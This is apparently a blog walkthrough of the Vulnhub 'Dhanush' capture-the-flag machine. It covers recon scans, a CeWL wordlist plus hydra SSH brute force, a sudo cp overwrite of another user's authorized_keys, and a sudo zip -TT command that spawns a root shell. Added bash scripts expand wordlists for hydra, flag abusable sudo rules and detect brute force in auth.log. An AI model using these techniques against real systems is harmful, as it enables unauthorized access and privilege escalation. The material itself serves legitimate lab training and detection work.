Vulnhub: Dhanush target machine walkthrough

Dhanush

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      2     120  VMware, Inc.
 192.168.187.155 00:0c:29:ab:6e:4f      2     120  VMware, Inc.
 192.168.187.254 00:50:56:e2:20:55      1      60  VMware, Inc.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
|   256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_  256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>

The target has no robots.txt.

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.155
+ Target Hostname:    192.168.187.155
+ Target Port:        80
+ Start Time:         2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto found nothing of real value; the only notable item is the directory listing on /images/.

Directory brute-forcing turned up nothing either.

So build a wordlist from the site's own content and see whether it will brute-force the SSH username and password:

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt
114 dict.txt

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345

hydra recovers the credentials pinak/Gandiv (the same 114-word list is used as both the username list and the password list).
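CeWL emits words exactly as they are capitalised on the page, and hydra tries every list entry literally, so a password that differs from the scraped word only by case is never tried. The function below is an added example and not part of the original walkthrough: it normalises a CeWL list into the original, lower-case and Capitalised forms with duplicates removed before the list is handed to hydra. The sample words are constructed for illustration; the hydra line at the end is the next step and is not executed by the script.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): prepare a CeWL wordlist for hydra.

# expand_wordlist INFILE OUTFILE [MINLEN]
# For every word of at least MINLEN characters (default 4, a common minimum
# password length), emit the word as scraped, in lower case and Capitalised.
# Duplicates are dropped and first-seen order is kept, so hydra tries the
# page's own spelling before the variants.
expand_wordlist() {
    local infile=$1 outfile=$2 minlen=${3:-4}
    awk -v minlen="$minlen" '
        length($0) >= minlen {
            lower = tolower($0)
            cap   = toupper(substr(lower, 1, 1)) substr(lower, 2)
            variants[1] = $0; variants[2] = lower; variants[3] = cap
            for (i = 1; i <= 3; i++) {
                if (!(variants[i] in seen)) { seen[variants[i]] = 1; print variants[i] }
            }
        }' "$infile" > "$outfile"
}

# count_lines FILE: line count without wc's leading padding.
count_lines() { wc -l < "$1" | tr -d ' '; }

# Demo on a constructed list; in the walkthrough INFILE would be the dict.txt
# written by `cewl -d 3 http://TARGET -w dict.txt`.
demo=$(mktemp -d)
printf '%s\n' Pinak Gandiv the Dhanush pinak > "$demo/dict.txt"
expand_wordlist "$demo/dict.txt" "$demo/dict_expanded.txt"
echo "$(count_lines "$demo/dict.txt") scraped words -> $(count_lines "$demo/dict_expanded.txt") candidates"

# Next step (not run here): reuse the list for both fields, and let -e nsr add
# the empty, login-as-password and reversed-login guesses hydra supports:
#   hydra -L "$demo/dict_expanded.txt" -P "$demo/dict_expanded.txt" -e nsr ssh://192.168.187.155 -s 65345
```

Three-letter words such as "the" are dropped by the default MINLEN; lower it if the target site is known to use short passwords.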

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh pinak@192.168.187.155 -p 65345
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
pinak@192.168.187.155's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh

Privilege escalation

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ 

Following the hint in pinak's .bash_history, use the sudo rule for /bin/cp to copy pinak's id_rsa.pub over sarang's authorized_keys. Because cp runs as sarang it can write into /home/sarang/.ssh, so a NOPASSWD cp as another user amounts to an arbitrary file write as that user; pinak's matching private key then logs in as sarang without a password:

pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1
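Both sudo rules on this box, /bin/cp as sarang and, further down, /usr/bin/zip as root, are NOPASSWD entries for binaries that GTFOBins lists as able to write arbitrary files or spawn a shell. The script below is an added example and not part of the original walkthrough: it reads `sudo -l` output, extracts each NOPASSWD run-as user and binary, and flags those on a short hand-picked list of abusable binaries (that list is an assumption, far smaller than GTFOBins). The sample input is reconstructed from the two `sudo -l` results shown on this page, plus one harmless rule.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): triage `sudo -l` output for
# NOPASSWD rules on binaries that give a shell or an arbitrary file write.

# Assumption: a short hand-picked list; GTFOBins has far more entries.
ABUSABLE_BINS="cp mv tar zip unzip vim vi nano less more find awk sed python python3 perl env bash sh"

# parse_nopasswd: read `sudo -l` text on stdin, print "runas binary" for each
# NOPASSWD command. Handles "(user) NOPASSWD: /a, /b"; for "(user : group)"
# only the user is kept; arguments after the binary are dropped.
parse_nopasswd() {
    awk '
        /NOPASSWD:/ {
            runas = $1
            gsub(/[()]/, "", runas)
            sub(/^.*NOPASSWD:[[:space:]]*/, "")
            n = split($0, cmds, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], parts, /[[:space:]]+/)
                if (parts[1] != "") print runas, parts[1]
            }
        }'
}

# flag_abusable: keep only "runas binary" lines whose basename is in ABUSABLE_BINS.
flag_abusable() {
    while read -r runas bin; do
        base=${bin##*/}
        case " $ABUSABLE_BINS " in
            *" $base "*) printf 'ABUSABLE: sudo -u %s %s\n' "$runas" "$bin" ;;
        esac
    done
}

# audit_sudo_l: full pipeline, `sudo -l` text on stdin -> flagged rules.
audit_sudo_l() { parse_nopasswd | flag_abusable; }

# Constructed sample: the two rules seen on this box plus a harmless `ls` rule
# (with arguments) to show that not everything is flagged.
SAMPLE_SUDO_L='Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
    (root) NOPASSWD: /usr/bin/zip, /bin/ls -l /var/log'

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
# On a live host: sudo -l | audit_sudo_l
```

The parser is deliberately simple: sudoers tags other than NOPASSWD (SETENV, NOEXEC) and wildcard commands are not handled, so treat its output as a starting point and read the raw `sudo -l` output as well.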

sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Nov  8  2019 .
drwxr-xr-x 22 root root 4.0K Nov  8  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root 1.5K Nov  8  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
          
                                            @p
                                           @@@.
                                          @@@@@
                                         @@@@@@@
                                        *"`]@P ^^
                                           ]@P
                                           ]@P
                               ,,,,        ]@P       ,,gg,,
                           g@@@@@@@@@b     ]@P    ,@@@@@@@@@@g,
                        ,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
                      g@@@@P^`        %NNNNN@NNNNNP          *B@@@g
                    g@@@P`                 -@                   "B@@w
                  ,@@@`                    ]@                      %@@,
                 @@P-                      ]@                        *@@,
              ,@@"                         ]@                          *B@
            ,@N"                          y@@B                            %@,
      ,,  g@P-                            ]@@@P                             *Bg ,gg
      @@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma     : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|

zip's -T flag tests the archive after it is written, and -TT replaces the default test command (unzip -tqq) with one of our choosing; zip appends the archive name to that command, which the trailing '#' turns into a comment, so 'sh' runs as root with a clean argument list. That gives us the root flag and a root shell.

Lessons learned

  1. The key to this box is building a wordlist from the site's own content with CeWL and then using hydra to brute-force the SSH username and password on the non-standard port 65345.
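The flip side of that lesson: a hydra run against sshd leaves a very recognisable trail in auth.log, one "Failed password" line per attempt from the same source followed by an "Accepted password" for the user it found, and the later key-based hop from pinak to sarang shows up as "Accepted publickey ... from 127.0.0.1". The script below is an added example and not part of the original walkthrough; the log lines are constructed to mimic OpenSSH's syslog format, and the hosts, ports, timestamps and fingerprint are invented.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): spot an SSH brute force and the
# logins that followed it in auth.log-style output.

# Constructed sample in OpenSSH's syslog format (hosts, times, ports invented).
SAMPLE_AUTH_LOG='Jul 12 02:50:01 ubuntu sshd[1201]: Failed password for invalid user dhanush from 192.168.187.150 port 51002 ssh2
Jul 12 02:50:01 ubuntu sshd[1203]: Failed password for invalid user arjun from 192.168.187.150 port 51004 ssh2
Jul 12 02:50:02 ubuntu sshd[1205]: Failed password for pinak from 192.168.187.150 port 51006 ssh2
Jul 12 02:50:02 ubuntu sshd[1207]: Failed password for pinak from 192.168.187.150 port 51008 ssh2
Jul 12 02:50:03 ubuntu sshd[1209]: Failed password for pinak from 192.168.187.150 port 51010 ssh2
Jul 12 02:50:03 ubuntu sshd[1211]: Accepted password for pinak from 192.168.187.150 port 51012 ssh2
Jul 12 02:51:40 ubuntu sshd[1302]: Accepted publickey for sarang from 127.0.0.1 port 40122 ssh2: RSA SHA256:constructedfingerprint
Jul 12 03:10:11 ubuntu sshd[1400]: Failed password for admin from 10.1.1.143 port 60000 ssh2'

# brute_force_sources THRESHOLD: read the log on stdin and print "ip failures"
# for every source with at least THRESHOLD failed password attempts.
brute_force_sources() {
    awk -v threshold="$1" '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= threshold) print ip, fails[ip] }' | sort
}

# successes_after_failures THRESHOLD: print "method user ip" for every Accepted
# login whose source had already crossed THRESHOLD failures earlier in the log,
# i.e. the credential the brute force eventually found.
successes_after_failures() {
    awk -v threshold="$1" '
        /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for / {
            status = ""; method = ""; user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "Failed" || $i == "Accepted") { status = $i; method = $(i+1) }
                if ($i == "for") { user = ($(i+1) == "invalid") ? $(i+3) : $(i+1) }
                if ($i == "from") { ip = $(i+1) }
            }
            if (status == "Failed") fails[ip]++
            else if (fails[ip] >= threshold) print method, user, ip
        }'
}

# loopback_key_logins: users accepted by public key from 127.0.0.1, the trace
# left by the pinak -> sarang hop on this box.
loopback_key_logins() {
    awk '/Accepted publickey for .* from 127\.0\.0\.1 / { for (i = 1; i <= NF; i++) if ($i == "for") print $(i+1) }'
}

printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 3
printf '%s\n' "$SAMPLE_AUTH_LOG" | successes_after_failures 3
printf '%s\n' "$SAMPLE_AUTH_LOG" | loopback_key_logins
# On a live host: brute_force_sources 10 < /var/log/auth.log
```

The threshold is a tuning knob: hydra's default of 16 parallel tasks produces far more than three failures per second, while a legitimate user mistyping a password rarely exceeds a handful per day.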
posted @ 2023-07-12 15:21  Jason_huawen